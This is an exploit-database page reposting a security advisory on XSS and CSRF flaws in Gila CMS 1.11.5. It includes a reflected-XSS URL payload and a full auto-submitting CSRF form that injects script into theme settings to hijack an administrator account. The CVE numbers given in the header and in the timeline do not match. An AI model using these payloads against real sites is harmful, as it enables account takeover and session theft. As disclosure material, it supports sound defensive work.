0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Gila CMS 1.11.5 Cross Site Request Forgery / Cross Site Scripting Vulnerabilities
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
=====[ Tempest Security Intelligence - ADV-07/2020 ]========================== GilaCMS - Version 1.11.5 Author: Rodolfo Tavares Tempest Security Intelligence - Recife, Pernambuco - Brazil =====[ Table of Contents]================================================== * Overview * Detailed description * Timeline of disclosure * Thanks & Acknowledgements * References =====[ Vulnerability Information]============================================= * Class: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Cross-Site Request Forgery (CSRF) [CWE-352] * CVSS:6.8.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H * CVE-2019-20804, CVE-2019-20803 =====[ Overview]======================================================== * System affected : GilaCMS - Version 1.11.5 * Software Version : Version 1.11.5 (other versions may also be affected). * Impacts : * XSS: Gila CMS before 1.11.6 is vulnerable to reflected XSS via the admin/content/postcategory in the id parameter, which is mishandled by g_preview_them. * XSS and CSRF: Gila CMS before 1.11.6 allows for CSRF resulting in XSS via the admin/themes URI, leading to full compromise of the admin account. =====[ Detailed description]================================================= 1- XSS at [http://localhostgila.com/admin/content/postcategory|http://localhostgila.com/admin/content/postcategory*] id parameter: To exploit the XSS via GET in the endpoint *cm/edit_form/postcategory* and parameter *id*, just insert a double quotes character (") to escape the string the, close the current by adding a ">" then include a javascript payload. Follows an example: * [http://localhostgila.com/cm/edit_form/postcategory?id=8"><script>alert(1)</script>] 2- CSRF and XSS at admin/themes: The following HTML code exploits both XSS and CSRF vulnerabilities. The admin/themes form is vulnerable to CSRF due to the lack of anti-CSRF tokens, and to XSS due to no proper validations of its inputs. To exploit these vulnerabilities, an attacker should host the following form and trick the administrator into visit this page. <html> <body> <script>history.pushState('', '', '/') </script> <form action="http://localhostgila.com/admin/themes?g_response=content&save_options=startbootstrap-creative" method="POST" enctype="multipart/form-data"> <input type="hidden" name="option[color]" value="#e91428" /> <input type="hidden" name="option[header-title]" value="Test" /> <input type="hidden" name="option[header-text]" value=""><script>alert(document.cookie)</script><!--" /> <input type="hidden" name="option[header-image]" value="" /> <input type="hidden" name="option[about-title]" value="<script>alert(0)<script>" /> <input type="hidden" name="option[about-text]" value="<script>alert(3)<script>" /> <input type="hidden" name="option[service-category]" value="1" /> <input type="hidden" name="option[project-category]"value="1" /> <input type="hidden" name="option[contact-title]"value="<script>alert(4)<script>" /> <input type="hidden" name="option[contact-text]" value="<script>alert(5)<script>" /> <input type="hidden" name="option[contact-email]" value="<script>alert(6)<script>" /> <input type="hidden" name="option[contact-phone]" value="<script>alert(7)<script>" /> <input type="submit" value="Submit request" /></form> <script> document.forms[0].submit(); </script> </body> </html> =====[ Timeline of disclosure]=============================================== 29/Oct/2019 - Responsible disclosure was initiated with the vendor. 02/Nov/2019 - GilaCms confirmed the issue; 07/Nov/2019 - The vendor fixed the vulnerability CSRF. 07/Nov/2019 - The vendor fixed the vulnerability XSS. 22/May/2020 - CVEs was assigned and reserved as CVE-2019-13364 CVE-2019-13363 =====[ Thanks & Acknowledgements]======================================== * Tempest Security Intelligence [5] =====[ References ]===================================================== [1][ [https://cwe.mitre.org/data/definitions/352.html]|https://cwe.mitre.org/data/definitions/352.html] [2][ [https://cwe.mitre.org/data/definitions/79.html]|https://cwe.mitre.org/data/definitions/79.html] [3][ [https://github.com/GilaCMS/gila/issues/56]] [4][ [https://github.com/GilaCMS/gila/issues/57]] [5][ [https://www.tempest.com.br|https://www.tempest.com.br/]|https://www.tempest.com.br/] =====[ EOF ]=========================================================== # 0day.today [2024-11-16] #